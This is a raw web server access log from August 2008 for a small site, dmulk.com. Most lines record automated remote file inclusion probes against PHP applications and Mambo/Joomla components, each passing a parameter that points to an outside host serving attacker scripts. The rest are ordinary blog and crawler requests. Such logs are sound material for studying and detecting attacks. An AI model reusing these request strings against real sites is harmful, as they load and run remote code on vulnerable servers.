217.198.149.178 - - [12/Aug/2008:10:56:06 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:56:23 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:33 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:37 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:56:38 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:10:56:44 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:10:56:44 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:56:52 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:56:53 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:56:55 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:56:58 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:57:13 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:57:17 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:57:26 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:57:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:57:33 -0700] "GET /logs/access_080107.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:57:33 -0700] "GET /logs/access_080107.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:57:53 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:57:59 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:10:58:42 -0700] "GET /logs/index.php?meio=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:10:58:45 -0700] "GET /index.php?meio=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 200 18379 "-" "libwww-perl/5.803" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:10:58:46 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:10:58:46 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:58:50 -0700] "GET /logs/access.log/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:58:50 -0700] "GET /errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:10:58:50 -0700] "GET /logs/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:10:58:51 -0700] "GET /logs/access_080218.log/index.php?main=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:10:58:53 -0700] "GET /index.php?main=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 200 18365 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:58:53 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:58:53 -0700] "GET /logs/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:58:53 -0700] "GET /errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:10:58:54 -0700] "GET /logs/index.php?main=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:58:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:58:59 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18541 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:59:53 -0700] "GET /logs/access_080321.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akxn/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:59:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:10:59:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:10:59:58 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.wingsart.ru/gstbook/templates/liscence.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:10:59:59 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akxn/ooid.txt?? HTTP/1.1" 200 18497 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:59:59 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18557 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:00:01 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18557 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:00:53 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
207.58.151.211 - - [12/Aug/2008:11:01:00 -0700] "GET /logs/access_080404.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:11:01:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:11:01:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:01:02 -0700] "GET /logs/access_080404.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:01:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:01:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.37.125 - - [12/Aug/2008:11:01:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [12/Aug/2008:11:01:16 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/feed/ HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [12/Aug/2008:11:01:40 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 10271 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:01:42 -0700] "GET /logs/access_080116.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:01:43 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:01:52 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:01:52 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:01:53 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:01:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:02:03 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:02:03 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:02:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:02:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:11:02:18 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:11:02:27 -0700] "GET /logs/access_080116.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:02:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:02:37 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:02:37 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:02:41 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:02:42 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:02:47 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:02:47 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:02:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:03:07 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:03:09 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:11 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:11 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:24 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:27 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:32 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:33 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:48 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:03:48 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:03:50 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:03:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:03:55 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:03:57 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:03:57 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:11:04:01 -0700] "GET /logs/access_080321.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akxn/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:11:04:02 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akxn/ooid.txt?? HTTP/1.1" 200 18513 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:04:25 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:04:26 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:04:36 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:04:36 -0700] "GET /logs/index.php?ort=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:04:37 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:04:38 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:04:38 -0700] "GET /index.php?ort=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:04:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
85.17.103.109 - - [12/Aug/2008:11:05:07 -0700] "GET /logs/access_080404.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:05:14 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:05:18 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:05:22 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [12/Aug/2008:11:05:36 -0700] "GET / HTTP/1.0" 200 18221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
75.127.68.188 - - [12/Aug/2008:11:05:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:11:05:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:11:05:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:11:05:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
